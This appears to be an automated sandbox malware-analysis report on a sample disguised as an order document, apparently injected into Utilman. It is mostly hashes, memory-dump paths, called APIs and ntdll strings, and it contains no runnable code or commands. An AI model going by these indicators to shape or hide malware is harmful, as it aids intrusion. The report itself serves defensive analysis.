                                                                                            • Opcode Fuzzy Hash: 3f7e588daebca4c0a56d8927e0ca50c7e4aae273fa8ca7d7d5b4d22a2f9a24d5
                                                                                            • Instruction Fuzzy Hash: 17D0A730919505DBDF17DF08C514D2E36B4FF50A41B40006CE708A1020E324DC02C700
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: c37f48569bb05566f81a61d15264186d3abf9edbcbea3c086a4ef933a252064b
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: 8BC012322A0648AFC712AA99CD01F027BA9EBA8B50F000021F6088B670D631E960EA84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: dfe662dd081cec0cc163b5d39c257529b20ba5bba1e3091f2a0efd25343ec5f4
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 70D01236100249EFCB01DF41C890D9A772AFBD8710F148019FD19076108A31ED62DA90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 9fdf66d9bf204bbd5dd377fbe590b56ca76e5ce896e8e7eeaf2a8c3b4b8266ec
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: 82C04879B01A468FCF16DB2AD294F59B7F8FB84751F150890E849DBB22E624EA41CA10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58d04ade0c867ddf83f6ee69da7c8f24dfc4a2dfbce6f1555e066db3037efacf
                                                                                            • Instruction ID: 8ab759fe33d3ae23d9d5fb91a4fb977e0d85352ac0662877464426c5d2f923ed
                                                                                            • Opcode Fuzzy Hash: 58d04ade0c867ddf83f6ee69da7c8f24dfc4a2dfbce6f1555e066db3037efacf
                                                                                            • Instruction Fuzzy Hash: 6E900231605900129280B15948885468049A7E0301B55C011F4465554CCA148A565761
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aad92f2dcec94e13f3bbaf763c27800d04e9c968d1f97c47c62d1cfb4c5a31af
                                                                                            • Instruction ID: 725f3b55a9daa460113e1d08bb14a0a6a77e9bd9d3945f5be27bd6e978fa7eb7
                                                                                            • Opcode Fuzzy Hash: aad92f2dcec94e13f3bbaf763c27800d04e9c968d1f97c47c62d1cfb4c5a31af
                                                                                            • Instruction Fuzzy Hash: 19900261601600424280B1594808406A049A7E1301395C115B4595560CC61889559769
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c24c05d91ad330e61a92cb3434593e9956b93d8eb55091e78f9a4e1bb1857264
                                                                                            • Instruction ID: e56422ffe0fdadaa06c4cc1b4dd062aa688fb3c9b8111018a5336aaaac644f81
                                                                                            • Opcode Fuzzy Hash: c24c05d91ad330e61a92cb3434593e9956b93d8eb55091e78f9a4e1bb1857264
                                                                                            • Instruction Fuzzy Hash: 3C90023120150802D244B1594808686404997D0301F55C011BA065655ED66589917731
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a892d2db8f062d6fe40097964cd1e64bd9f0959c5efbb3574362f6ae41c04e6b
                                                                                            • Instruction ID: 221cece1857253e74831153abc19a994b8dc3159cee643a558269ecf0c359b55
                                                                                            • Opcode Fuzzy Hash: a892d2db8f062d6fe40097964cd1e64bd9f0959c5efbb3574362f6ae41c04e6b
                                                                                            • Instruction Fuzzy Hash: 7B90023160550802D290B1594418746404997D0301F55C011B4065654DC7558B557BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 716b56621917e6f88ad628b337ff762758973622f39244c2282c3ac13dd5c276
                                                                                            • Instruction ID: 619a6bf0cef02b2b806630b4fe09082ee8ef3baa74c6d69ba38257856d0143f3
                                                                                            • Opcode Fuzzy Hash: 716b56621917e6f88ad628b337ff762758973622f39244c2282c3ac13dd5c276
                                                                                            • Instruction Fuzzy Hash: 6390023120150802D2C0B159440864A404997D1301F95C015B4066654DCA158B597BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                                                            • Instruction ID: abbfad4ba4bd0a5926e8f25432b8c29a971c612e39e80d5cb5a37d603f040372
                                                                                            • Opcode Fuzzy Hash: 9dc4e6cabcdd5f6603c0438b6f57b76527fbed633a26013fb64c4042e5a2a7ae
                                                                                            • Instruction Fuzzy Hash: 5590023120554842D280B1594408A46405997D0305F55C011B40A5694DD6258E55BB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                                                            • Instruction ID: 67b1cd01cdffa99f1cbd5483b7b78d7a8dd1828bd2662b85771e46ae3f4b8435
                                                                                            • Opcode Fuzzy Hash: df6ad809aa6481d9b73cb2ac96bc2fe41e4fdeac59eba855f606ed950ed6ae4f
                                                                                            • Instruction Fuzzy Hash: 2E9002A1201640924640F2598408B0A854997E0201B55C016F5095560CC52589519735
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                                                            • Instruction ID: cba5cde2b31de327049d2ae3c225d98ead888f12ff06ce022f8e430e382ce612
                                                                                            • Opcode Fuzzy Hash: ac8922571743362e81a054566b180ab56600170f4a1e55186dd3ceec850b03e0
                                                                                            • Instruction Fuzzy Hash: FD900435311500030345F55D070C50740CFD7D5351355C031F5057550CD731CD715731
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                                                            • Instruction ID: 0ca346acbda112cf7ad2f240447a40b59918125c3f070a25eabdfd941d7bd698
                                                                                            • Opcode Fuzzy Hash: 8f528261cd5b561cb9d2abf95391533303ce3ae41f0ad60d351feb2e07db4c76
                                                                                            • Instruction Fuzzy Hash: 67900225221500020285F559060850B4489A7D6351395C015F5457590CC62189655721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                                                            • Instruction ID: 133b07500af07e13fe7b5d7b903a6b114ab90960dd9b97dd22d5d5e842c35e10
                                                                                            • Opcode Fuzzy Hash: a2608f80bd95b1b06e333ed20dabae543500500f21683c4f86754d9e6a20fabf
                                                                                            • Instruction Fuzzy Hash: 7F90023124150402D281B1594408606404DA7D0241F95C012B4465554EC6558B56AF61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                                                            • Instruction ID: e4d2f0468b64483df219975b6e2f29f0d84f9b962ea6c6f49270841ebce41c83
                                                                                            • Opcode Fuzzy Hash: 9a398c2c2856168b3e3d390d5d22eeabd518fe17515f6a18ee18356ba1fe90dc
                                                                                            • Instruction Fuzzy Hash: 1C900221242541525685F1594408507804AA7E0241795C012B5455950CC5269956DB21
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                                                            • Instruction ID: 78331191ac51268fc41511ab424e4a4168ded7facc796d67bd2dd8d2f4c7056b
                                                                                            • Opcode Fuzzy Hash: 5c81b33e91c799f21d8b709fcdda65623ba58ccc9cb7d974f051adf5e5fd4b5b
                                                                                            • Instruction Fuzzy Hash: 5E90022921350002D2C0B159540C60A404997D1202F95D415B4056558CC91589695721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                                                            • Instruction ID: 2f68990b492502659dcdd4630fadf6a1cc846f38f424c76efbdeadc318ed0d52
                                                                                            • Opcode Fuzzy Hash: b3e07528b0641f250b29bf70825210075b26758f7fd397720d4e62083662978e
                                                                                            • Instruction Fuzzy Hash: 0C90022120554442D240B559540CA06404997D0205F55D011B50A5595DC6358951A731
                                                                                            • Instruction ID: c0dd936414fac6228882ae1d7af0a42bab7f300c67065587a9b406b78123b22c
                                                                                            • Opcode Fuzzy Hash: a0782fc1096334bcf8606e71b4169dc71a065d7b0defcbced6004c94bedc33d6
                                                                                            • Instruction Fuzzy Hash: AF90023520150402D650B1595808646408A97D0301F55D411B4465558DC65489A1A721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: c8d67e31b4a9b14d32404b6eb8328d285899780ee0be309bd48d48352ee3df5c
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            Strings
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01974742
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01974725
                                                                                            • Execute=1, xrefs: 01974713
                                                                                            • ExecuteOptions, xrefs: 019746A0
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01974787
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01974655
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019746FC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$[$]:%u
                                                                                            • API String ID: 48624451-2819853543
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019702BD
                                                                                            • RTL: Re-Waiting, xrefs: 0197031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019702E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 01977B8E
                                                                                            • RTL: Re-Waiting, xrefs: 01977BAC
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01977B7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197728C
                                                                                            Strings
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01977294
                                                                                            • RTL: Resource at %p, xrefs: 019772A3
                                                                                            • RTL: Re-Waiting, xrefs: 019772C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$]:%u
                                                                                            • API String ID: 48624451-3050659472
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            APIs
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0198CFBD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8
                                                                                            • String ID: @$@4Cw@4Cw
                                                                                            • API String ID: 4062629308-3101775584
                                                                                            • Opcode ID: 4d45bf4a118f2500e51a3018b02e54d1970b79cd2e857afa5cc706e3dbb3d9a8
                                                                                            • Instruction ID: df8068337b8f8bbc60faf3eb07ec49625be59b0adea79d5d790e558b220ae8c9
                                                                                            • Opcode Fuzzy Hash: 4d45bf4a118f2500e51a3018b02e54d1970b79cd2e857afa5cc706e3dbb3d9a8
                                                                                            • Instruction Fuzzy Hash: CB418271900219EFDB21EF99C840AADBBF8FF95B50F10442EEA19EB294D734D941CB61

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.4%
                                                                                            Dynamic/Decrypted Code Coverage:4.4%
                                                                                            Signature Coverage:1.6%
                                                                                            Total number of Nodes:428
                                                                                            Total number of Limit Nodes:71
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C914
                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C94F
                                                                                            • FindClose.KERNELBASE(?), ref: 0321C95A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 53a868ac99686a0820383296e2ebd591f73e125cad426cdcfe0e48020ef1f4ba
                                                                                            • Instruction ID: 317dd99c1760fcd27758259a3cb8b596fe6bf1a7a5b62367fca381595de2d10f
                                                                                            • Opcode Fuzzy Hash: 53a868ac99686a0820383296e2ebd591f73e125cad426cdcfe0e48020ef1f4ba
                                                                                            • Instruction Fuzzy Hash: 2131C5BA9103197BDB20DB64CD85FFF77BC9F44700F144458B908AA180DAB0AAD48BA1
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(?,?,42638B06,?,?,?,?,?,?,?,?), ref: 032294DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: bab0bb821dfa4d108ce6faeabe1280697d341e5bf3f286cbdc0314a3edbf00d8
                                                                                            • Instruction ID: 243127ee15d2ddc5270265a93caf721f0279b96b84c3d58279574e8dc65487f7
                                                                                            • Opcode Fuzzy Hash: bab0bb821dfa4d108ce6faeabe1280697d341e5bf3f286cbdc0314a3edbf00d8
                                                                                            • Instruction Fuzzy Hash: E431E8B5A11248AFCB14DF99D980EDFBBB9EF8C300F108209F919A7340D770A951CBA5
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(?,?,42638B06,?,?,?,?,?,?), ref: 03229636
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 6b474681eaee029840458f93b8e77d28fd0a2feed6c2ff264b1a9b8bdd331e55
                                                                                            • Instruction ID: d0d63b8dd2c91a7c8b9c7a93c4cbe537e3bbc5a2214bb29dfb487f5363e4d84e
                                                                                            • Opcode Fuzzy Hash: 6b474681eaee029840458f93b8e77d28fd0a2feed6c2ff264b1a9b8bdd331e55
                                                                                            • Instruction Fuzzy Hash: 9031F9B5A10249AFCB14DF99D880EEFB7B9EF88310F108219F919A7340D770A951CBA5
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(03211FBE,?,42638B06,00000000,00000004,00003000,?,?,?,?,?,032281BE,03211FBE,0322B74E,032281BE,8B0C4D8B), ref: 03229908
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 0a3ba71116ef5ff642394d81cd8d94bae43bc770b5dd043abb33e04c2fec5cee
                                                                                            • Instruction ID: 201325e72b85ec7e4e928f26b50ebcc0479d4b83434bacb44405250916f2b12f
                                                                                            • Opcode Fuzzy Hash: 0a3ba71116ef5ff642394d81cd8d94bae43bc770b5dd043abb33e04c2fec5cee
                                                                                            • Instruction Fuzzy Hash: EF213DB5A10259AFDB10DF99DC41EEFB7B9EF88700F104209FD19AB280D770A951CBA5
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteFile
                                                                                            • String ID:
                                                                                            • API String ID: 4033686569-0
                                                                                            • Opcode ID: 2875a14c3a711f444044c855eb9c7ecbdd29c215752dc0ecbdd80d119122922f
                                                                                            • Instruction ID: 9eb477f5f7eedaed337a63391f28a16f4ad103b82315ffc56ebda7d6275e5d04
